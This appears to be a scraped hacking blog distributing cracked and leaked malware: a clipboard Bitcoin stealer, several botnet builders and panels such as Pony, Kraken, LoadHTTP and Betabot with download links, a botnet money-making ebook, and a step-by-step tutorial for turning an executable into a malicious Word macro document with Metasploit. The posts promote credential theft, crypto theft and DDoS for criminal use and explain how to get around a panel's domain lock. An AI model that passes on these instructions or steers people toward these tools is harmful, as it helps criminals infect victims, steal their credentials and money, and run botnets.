Bitcoin Switcharoo BTC stealer source!

Hey everyone, I've been looking around for new programs to crack and release. This program was made on the popular skidforum, "Hackforums.net"

Heres a pic of the thread

BTC Switcharoo is very simple, it replaces an address on the persons clipboard with your own. This does not start with Windows so you can use it with your crypters if need be. I was intending to make it in .NET, but that would be too easy, so I set myself a challenge.Its coded in C, for those wondering, and compiled with Tiny C Compiler. Tested on XP x86 and Windows 7 x64
 

It was an easy crack.


source: We have switched to http://lethaldose.me for downloads

another easy crack. See you all later!

How to make money from your botnet! Quick and easy! 7 METHODS!

Hey everyone, this is an ebook i wrote awhile ago, it was originally for HF, then i got no sales, and omni was being a bitch. 

http://adf.ly/1AxukP

Blue DDOS botnet. Stub source, panel source, builder.

Blue botnet is a high quality ddos botnet. 50 bots apparently can take down the skid infested "hack forums.net".. The "Owner" contacted me looking to buy some bots and a possible partner ship. He didn't have a crypt, and was half mental. He pissed me off so I did some research, took apart his stub, and then finally got ahold of the panel.. The coder is stupid.

Screenshots of the sauce:

some info on the botnet:
https://www.youtube.com/watch?v=HJn0bAWsw8I
https://www.youtube.com/watch?v=EjffaU4p3pQ
http://its-ownz.blogspot.com/2015/02/blue-botnet-http-botnet.html


Email: botzone0@gmail.com

WILL GIVE FOR FREE, JUST SHOOT ME AN EMAIL, WILL BE FULLY LEAKED IN 2 DAYS

µBot Botnet source and analysis

I'm sure many people reading this have heard of the malware with the name of "uBot". The source of this botnet was released earlier this year, It was originally named "WebNet". This botnet has a very small stub size of only 9KB compressed, and about 36KB un-compressed.

The features include;

INSTANT Infection, no waiting.
– Download & Execute.
– Update.
– Visit Webpage [Visible].
– Visit Webpage [Invisible].
– Uninstall.
– Add to Startup.
– Critical Process.
– Hidden File.
– Admin detection.
– Mutex.
– Coded in VB6, no .NET Framework dependency!
– Small, ~10kb compressed, 36kb uncompressed.
– Great stability.

Panel:
– Detailed statistics.
– Location plot, map graph.
– Pie Charts [Bot Status, Operating System, Admin].
– Tool-tip for last commands sent for each client.
– Bot selection preferences.
– Integrated Ajax, means everything is realtime! From client list to bot count.

On top of the extremely small stub size, its coded in vb6, so there is no .net dependancies, and the botnet panel is almost or as simple as the betabot 1.7.0.1 panel . This was a very stable botnet in its time, but I'm not sure how stable it is now that it has been leaked and malware researchers have taken a look at it. The main per pose for this botnet was for stability and for easy use.

Heres the downloads.

http://www.mediafire.com/download/vkqg2zgwonr78l9/uBot_Sauce.rar
that download includes the panel + vb6 stub source, and the sql files.

.exe to .doc silent macro exploit tutorial

I see everyone trying to sell this for $500++ on various forums, the problem is that people are actually buying it. So, http://botzone1.blogspot.com is going to teach you how to create your own .doc exploit.

Things you will need:

- FUD server (it can be detected, but its going to be like 60/63)
- Metasploit (can be downloaded here)
- Microsoft word (to test it)

The following Microsoft applications are affected:

• Microsoft Office 2007 SP3
• Microsoft Word 2007 SP3
• Microsoft Office 2010 SP1 and SP2 (32-bit and 64-bit editions)
• Microsoft Word 2010 SP1 and SP2 (32-bit and 64-bit editions)
• Microsoft Office for Mac 2011
• Microsoft Office Compatibility Pack SP3
• Microsoft SharePoint Server 2010 SP1 and SP2 with Word Automation Services
• Microsoft Word Web Apps 2010 SP2 and prior

 Alrighty, lets get started.

You're going to want to fire up the metasploit pro console, it might take a few minutes for it to be ready for use.

 You should be looking like this:

alright so you are going to want to type this in "cd C:\metasploit\apps\pro\msf3\tools", and then go into a new windows explorer window and place your infected file into that directory.

Unfortunatly my metasploit just crashed, so I'm going to wing the rest of the tutorial, post any questions in the comments.

alright so now we're inside of the directory, now type this "exe2vba.rb infectedfile.exe evil.vba"

now go back to your windows explorer window, and look in C:\metasploit\apps\pro\msf3\tools and you should see a file called "evil.vba".. if you dont see that file restart.

open the .vba file. There will be two sections in the file (just open it in notepad). The first part is the vba script, and the other part is the shellcode. the shell code is going to look like a bunch of numbers and letters.

exe2vba.rb infected.exe evil.vba

alright, now open up microsoft word (MUST BE A Vulnerable VERSION!!!) go to view, and select macros

copy the vb code (NOT the letters and numbers) and paste it into the first portion of the vb file

save it as a word97-2003Doc. alright, almost done! Now open the document and paste the shell code (letters & numbers) into the document, and save it again. Congratz, you just made the exploit, was it still worth $500? that's what I thought.... I'm going to be posting a tutorial on how to make it completely fud very soon.

c:\metasploit\apps\pro\msf3\tools

c:\metasploit\apps\pro\msf3\tools

c:\metasploit\apps\pro\msf3\tools

Pony Botnet 1.9 leaked (advanced stealers included)

Pony 1.9 is notorious for banking, bitcoin stealing, and stealing other things..

The Bitcoin theft is in addition to a slew of credentials, over 700,000, that Pony pilfered from September 2013 to January including: 600,000 website login credentials 100,000 email account credentials 16,000 FTP account credentials 900 Secure Shell account credentials 800 Remote Desktop credentials - See more at: http://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463#sthash.f17KzXK0.dpuf

Pony steals more than 30 concurrency wallets, and is very good at what it does. Some of the botnet is based off the Zeus src source. I personally used this botnet for a year and moved on to more updated malware, but at the time that I used it, it worked fantastically. Most of the panel is in russian, along with the builder, but we were able to translate the russian in the builder.

builder screenshot:

The builder was leaked by a member on the forum "TrojanForge" and the botnet was sold on multiple underground forums. The botnet is good at what it does, and is up at the top with betabot, zeus, and citadel.

Here are the downloads..

Builder:
We have switched to http://lethaldose.me for downloads
Panel:
We have switched to http://lethaldose.me for downloads

Coiner HTTP leaked panel

Before I even start to write this article, I want everyone to know that coiner http is the worst bot on the market right now. Its fucking awful. The only reason why im writing this is because its awful and the owner needs to be exposed.


The bot was coded by the member "Sh1eld" on hackforums. its coded in shit.net (vb.net). It claims to have a bunch of features, but every customer claims they never worked, the the botnet it self didnt work.


The owner is selling it for 100$ per bin. But hes accepting paypal? Paypal and malware don't mix well. The coder also leaves a negative reputation on anyone that hates on him. The stub is 110kb, rather large. I really have nothing to say about this bot, its basically a fancier version of ubot with some more features that dont work.


Im going to leak the panel for now, I'm currently working on a builder..


panel screenshot:

panel download: http://www.mediafire.com/download/ygdv4dnys9hd8w2/coiner_panel.rar


builder download:


coming soon:)

Tweets

Tweets by @LinuxSquad1

Kraken HTTP botnet cracked + Downloads

Here we have yet another hackforums.net botnet. This is one of the "Higher-end" botnets  on hackforums, kinda like betabot 1.7.0.1 was. I personally never really liked kraken, but after looking deep into the thread it looks somewhat nice. The bot is coded in FASM, and has a surprisingly small stub size (22kb), compared to the un-crypted betabot bin (120kb+). I normally would have bought a bot like this, but the panel is just ugly. REALLY ugly. You will see later in the article. The most recent "update" consists of this, (direct quote from coder/seller)

-> Integrate Rootkit & in the corebin.
-> HTTP Function have got buffer increased.
-> Execution of Task Improved -
-> Minor update on panel
-> FileZilla Updated
-> Pidgin Stealer

-> Chrome & Internet Explorer form grabber finished with support of SPDY
-> Traffic Encoded.
-> CronJob Improve
-> Chrome Steale

-> BOTKILL now disable CriticalProcess or BSOD Protection of other malware. The method is now hard, it's just about disable flags of the process.
-> Logs, export/search
-> Startup Recoded
-> Total Commander FTP Stealer added.

As you can see, its not a bad bot at all. The price tag is a bit hefty though.

so say you were to buy all the add-ons, you would be spending $1000. Betabot was only 500$. in conclusion, betabot WAS the better deal.

Heres some screenshots of the rather ugly panel.

Here's some screenshots of the builder.

The builder was cracked by a member of trojanforge, The name was NoNa.

The panel currently has a domain lock, but you can easily change that with a few tweaks;)

downloads

builder:

We have switched to http://lethaldose.me for downloads

panel:
(remember the domain lock)

We have switched to http://lethaldose.me for downloads

The rise and fall of the exploit kit named "RIG"

Hello fellow viewers, tonight I'm going to be making an article explaining the rise and fall of one of the well known exploit kits, "RIG". Rig exploit kit was sold on the forum "exploit.in", a somewhat well-known private Russian forum. After seeing re-sell threads on the forum "HackForums", the owner and one of his "partners" wanted to take action and stop the re-sellers. A user by the name of "0x43" joined the forum and quickly gained reputation, along with some hate on the way. At the start of the sales, the re-seller (0x43) raised the prices almost double what the original coder sold it for on the Russian forum, that raised flags. Some members liked it being sold on hackforums, saying it was a good addition to the forum, and others did not. Below is a quote from a hackforums member when the thread was made

"I really dislike this being sold here, users here are way to unintelligent and too immature." - Hackforums member

one member finally pointed out that the prices were higher than the original seller sold it for. 0x43 said " Price increase. I can set price how ever I set it to."

 After sales went on for weeks, 0x43 was BUSTED, and scammed over 2k+. Shortly after the scammer was exposed, he created a twitter account named "EkMustDie" containing a dump on the most recent rig database and files (stay tuned for download links on that). Long story short, the coder of rig made a huge mistake in trusting this guy, and the rig files were leaked. The member was also banned from HackForums.net permanently.



exploit.in thread (non-scammer non-reseller thread, the coders thread):

hackforums.net thread (SCAMMERS THREAD 0x43's):

I cant seem to upload the image right now, ill update this post asap.

LoadHTTP Botnet cracked + Downloads

Hey BotZone. I recently came across the builder source for the botnet "LoadHttp". This bot was sold on the forum HackForums, and developed by _Stoner, A member of that forum. The botnet cost $500 for one build.

Below is a direct quote from the coder himself.

Pricing:
$500

$50 for update/rebuild
Updates that are purely bug fixes are free.
Customer Support free

For now I only accept BTC.
Contact me on Jabber if you wish to purchase. If you do not have Jabber, register one and contact me.

Now, me being the person I am, i went ahead and bought it... It was a biiiiiiiiiiig mistake. The botnet sucked, there was no rootkit (proven later in the article) and it was just awful.


Some things to know about the bot (direct quote from _Stoner)

Purpose and General Objectives of the Bot:
This botnet is made to be as long-lasting and resiliant as possible. HTTP communication allows for a large number of infections at
once. The program requires no dependencies on the computer except for Windows OS itself: it is coded in C++ (no C-runtime required and supports unicode). The bot has an effective Anti-Virus disabler that supports 31 different security solutions covering a vast 95%+ of the AV market. This means you will retain larger amounts of bots by avoiding a lot of AV detections and removals. It also has an Anti-Malware routine which successfully kills the majority of all malware, even those notorious for being resistant to tampering. The startup key, installed file, and process are all protected. This botnet system is the best of its kind for holding infections for a long time.

Anyways, the botnets not AWFUL, but its still shitty.

The cracked version of the bot was leaked on the forum TrojanForge.co, and the title of the thread was "LoadHTTP shit bot builder" posted by the member NoNh. Although the member duyan13 was the one doing all the work. Almost every reply talks about how the bot is shit, and its another shitty hf bot. lol. Although the coder is continuing to sell the bot on the poplar hacking forum HackForums, sales have dropped tremendously.

Inside of the zip file containing the panel files, and the builder itself, theres a info.txt containing this:

====================================================================================================
====================================================================================================
1) This bot is absolute piece of Shit
2) I take no credit for the builder, I just made it noob friendly for lazy people who asked me kindly so ...
3) Binary is Properly unpacked (modded UPX header Shit)
3) Builder originaly coded by duyan13 all credit on the RE goes to him Too
4) If it is not working for you, maybe you shouldn't be using it ... or it's shit ... or Domain name too long ... anyway see point 1
5) Builder Binary is Packed : MD5 776A76F179E3E0DCD8F8D496AC19925D
====================================================================================================
====================================================================================================

Heres some screenshots of the botnet:
Machines List: http://i.gyazo.com/ac3afa69b8d3b95af3e05bf6cb034267.png
Commands Management[1]: http://i.gyazo.com/9a0ccd7e3a434289ef2bf524cbdff4b9.png
Commands Management[2]: http://i.gyazo.com/59bec71ed534be0053c423e52d6b3178.png
Commands Management[3]: http://i.gyazo.com/e636ac62d4d60afb4791da575b8d08b7.png
Commands Management[4]: http://i.gyazo.com/9e326f8a85e3ac961f935135d3bae857.png
Users Management: http://i.gyazo.com/f117b1648cf2652133d37d233935a63a.png
Preferences: http://i.gyazo.com/3696cfa45df8d1331aeb0775e3e64e0d.png
Login Page: http://i.gyazo.com/72418eb52f7f749230978d5cd807f19b.png 


Heres the download links:

Panel + Builder We have switched to http://lethaldose.me for downloads

Betabot 1.7.0.1 Cracked full download

As some may know, betabot was one of the best botnets for banking, and formgrabbing in its time. It was sold for 500$ a bin by the coder named " Betamonkey" the most recent version of the bot (1.7.0.1) has been cracked, and botzone is here to leak it to you all!
The cracked builder was first found on the forum "HackHound" The forum that also cracked loadhttp botnet (you will see a loadhttp post soon). The original HackHound thread can be found here. The member "duyan13" was the leaker.

A little info on the bot;
Betabot was coded in c++. Some of the earlier versions of this bot were made in 2012-2013 by "Betamonkey" Some of the most notorious features were the formgrabber, and botkiller, and the stability.

Some quotes from the sales thread:

Coded professionally in C++, Beta Bot is the product of nearly a year and a half of hard work, long nights, and uncanny dedication. With the goal of creating a bot with a very diverse list of functioning features for a more than fair price, we’ve searched high and low, talking to everyone possible to create the most appealing and useful bot possible. All of our features work fully (except maybe the experimental Ruskill), nothing included is useless dead weight, and everything should prove to work very efficiently and effectively.
Coded by Betamonkey

Bot Killer
The next-gen Bot Killer in Beta Bot will successfully kill and remove all major malware you may come across when working with Install Shops and Pay Per Install ventures. The Bot Killer scans process and start up locations for suspicious entries. All injected code and crypted files using RunPE methods with be terminated. However, removal of the physical source of injected code from the disk is not always possible.

source: http://www.toolbase.me/board/topic/4754-beta-bot-panel-builder/

Screenshots of the builder:

betabot 1.7.0.1 cracked builder screenshot

Some panel screenshots:

betabot 1.7.0.1 panel screenshots cracked

BUILDER DOWNLOAD LINKS:
you can download the builder here

PANEL DOWNLOAD LINKS:
you can download the panel files here

Contact information:
email: botzone0@gmail.com
(expect a fast reply)